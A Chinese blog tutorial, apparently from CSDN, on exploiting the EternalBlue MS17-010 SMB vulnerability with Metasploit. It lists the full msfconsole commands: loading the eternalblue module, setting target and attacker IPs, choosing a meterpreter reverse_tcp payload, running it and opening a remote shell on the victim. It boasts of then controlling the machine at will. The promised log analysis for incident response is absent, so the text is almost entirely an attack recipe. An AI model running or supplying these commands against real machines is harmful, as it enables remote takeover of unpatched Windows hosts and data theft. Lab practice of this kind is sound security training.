永恒之蓝MS17010漏洞利用,以及日志特征和MSF使用方法

永恒之蓝MS17010漏洞已经出现很多年了,但红队演练还经常有他的传说。

这里主要是介绍如何利用永恒之蓝MS17010漏洞攻击,以及攻击成果后的操作系统日志分析,看看默认的操作系统日志是什么,方便在应急排查时对攻击有个清晰的了解。

一、先用永恒之蓝检测工具检测一下,很快就有结果了

二、使用msfconsole进入msf框架

打开msf并重新加载全部文件

reload_all

三、攻击使用的命令:

使用模块进行分析并攻击

use exploit/windows/smb/ms17_010_eternalblue

设置攻击目标地址set RHOST 目标IP地址(也就是靶机地址)

set rhost 192.168.2.109

设置攻击源地址set lhost源IP地址(也就是攻击机地址)

set lhost 192.168.2.110

设置也payload来监听攻击成功后返回的shell。攻击目标是64位操作系统,如果是32位系统set payload windows/meterpreter/reverse_tcp

set payload windows/x64/meterpreter/reverse_tcp

查看配置

show options

开始攻击常用exploit和run命令来运行攻击脚本,但这里使用exploit可能会无效,所有选择了使用run,等会出现Meterpreter session 1 opened就表示攻击成功获取session就可以远程控制为所欲为了,是不是很超级简单(有手就行)

run

为所欲为,跟玩自己电脑一样:

四、说好的跟操作自己的电脑一样,为什么还是meterpreter

其实现在我们只是meterpreter的payload进行连接shell,当然可以直接切换shell

shell

输入shell后看起来就是自己电脑的cmd界面一样了。

记得选择kali中简体中文,不然是乱码中文:

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值